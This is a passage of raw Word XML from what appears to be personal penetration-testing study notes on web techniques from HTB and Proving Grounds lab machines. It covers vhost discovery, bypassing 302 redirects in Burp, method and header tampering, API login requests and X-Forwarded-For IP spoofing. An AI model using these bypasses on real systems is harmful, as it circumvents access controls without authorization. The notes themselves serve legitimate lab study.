            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://explore.whatismybrowser.com/useragents/parse/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to parse user agents and help us understand more about it</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ympcsguhzxfw" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Requests</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Who sent it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the referrer and user-agent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000380">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Who received it?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000381">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="951"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the host</w:t>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ugv2zgxoj5ne" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Pages (how to find domain names)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000384">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes when we visit a website, we are met with some default Ubuntu, Apache or default centOS webpage. There is no content. That usually means there is some virtual hosting, and we have to find the hostname</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try adding the IP and the box's name. Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">twomillion.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(just an example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000387">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try curling the webpage and get the HTTP Response Headers. Then, look at the "X-Backend-Server" header, and see if it displays any domain names. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000388">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000389">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This worked in the Paper HTB, where it displayed: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Backend-Server: office.paper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000038C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5b0a72mxcyne" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass/Avoid Redirection using Burpsuite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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had a login.php page and also a command.php page. But, when we tried viewing the command.php page, we were redirected to this login.php (with status code 302). </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This makes the status code 302 websites really useful, since we can avoid being re-directed</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So, to avoid redirection, we can intercept on Burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000393">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the top line change it from "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the line "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: /login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and delete it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This Location header is what does the redirection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then send this request back to browser </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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4s0mt52z5h54" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interesting web attack vector with changing request type, and adding headers</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The </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nickel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice (which is actually a windows machine), had a really interesting web attack vector in order to get foothold.</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They first ran into an APIPA (Automatic Private IP Address) 169.254.59.27. The Internet Assigned Numbers Authority (IANA) has reserved the IP address range from 169.254.0.1 to 169.254.255.254 specifically for APIPA.</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then saw it was trying to access port 33333, so they tried accessing that, and the got a response "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;p&gt;Cannot "GET" /list-current-deployments&lt;/p&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is a hint that maybe GET is not right, and maybe POST is write. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they added the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="975"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they got the error message "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;hr&gt;&lt;p&gt;HTTP Error 411. The request must be chunked or have a content length. &lt;/p&gt;&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This hints that we have to add a content-length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="824"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they added </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-H 'Content-Length: 0'</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And then they were finally able to access pages, which give them credentials!</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_va9voelx4qww" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing API endpoints in website URL</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A REALLY good example of playing with API endpoints was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice (you can tell by the name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4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writeup which is more concise but skips on details but provides multiple ways to exploit</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 8.3.3. Enumerating and Abusing APIs</w:t>
      </w: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It also teaches us how to create JSON POST payload from scratch within the CURL command. Like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login</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2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t0qumhrch802" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to pretend to be another IP when viewing pages (IP Spoofing) using X-Forwarded-For</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Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Xposedapi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice when we got this 403 error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1473200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="46"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147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6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was blocking our IP, so we likely have to access it through local host or trick it into thinking the web request is coming from local host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="178" name="image209.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image209.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We added the X-Forwarded-For line</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And now we have a 404 error instead of 403, meaning we can access the page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2146300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="484" name="image469.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image469.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, a website said that we were blocked from visiting the site and that we had to be on 10.10.10.x in order to view the site. So, we can use the X-Forwarded-For HTTP request header to pretend to be 10.10.10.10. This is also known as IP Spoofing</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The HTTP X-Forwarded-For (XFF) request header is a de-facto standard header for identifying the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">originating IP address of a client</w:t>
      </w:r>
